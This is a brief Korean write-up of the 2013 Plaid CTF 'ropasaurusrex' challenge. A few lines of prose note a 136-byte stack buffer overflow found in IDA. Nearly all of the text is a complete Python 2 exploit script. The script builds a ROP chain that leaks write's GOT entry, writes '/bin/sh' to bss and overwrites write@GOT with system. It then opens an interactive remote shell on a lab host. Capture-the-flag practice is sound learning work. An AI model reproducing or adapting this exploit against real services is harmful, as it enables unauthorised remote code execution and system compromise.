Piaid CTF 2013 Ropasaurusrex 풀이

Piaid CTF 2013 Ropasaurusrex 풀이

아이다로 바이너리 파일을 보면, 한눈에 바로 취약점이 보인다.

버퍼는 136바이트 

페이로드.

간단히 ROP하시면 됩니다.

클리어!

from socket import *

import struct

import time

p = lambda x: struct.pack("<L", x)

up = lambda x: struct.unpack("<L", x)[0]

host = "10.211.55.4"

port = 9999

s = socket(AF_INET,SOCK_STREAM)

s.connect((host,port))

pop3ret = 0x080484b6

write_plt = 0x0804830C

write_got = 0x08049614

read_plt = 0x0804832C

bss = 0x08049628 

cmd = "/bin/sh"

offset = 633536# write - system

payload= "A"*140

#libc

payload += p(write_plt)

payload += p(pop3ret)

payload += p(1)

payload += p(write_got)

payload += p(0xff)

#bss 

payload += p(read_plt)

payload += p(pop3ret)

payload += p(0)

payload += p(bss)

payload += p(0xff)

#write -> system

payload += p(read_plt)

payload += p(pop3ret)

payload += p(0)

payload += p(write_got)

payload += p(0xff)

#system

payload += p(write_plt)

payload += "AAAA"

payload += p(bss)

s.send(payload+'\n')

time.sleep(0.1)

s.send(cmd+'\n')

write_libc = up(s.recv(4))

print "[+] write_libc : " + str(hex(write_libc))

system_libc = write_libc - offset

print "[+] system_libc : " + str(hex(system_libc))

time.sleep(0.1)

s.send(p(system_libc)+'\n')

while True:

    cmd2 = raw_input("$ ")

    if cmd2 == "exit":

        s.close()

    s.send(cmd2+"\n")

    print s.recv(2048)

    

s.close()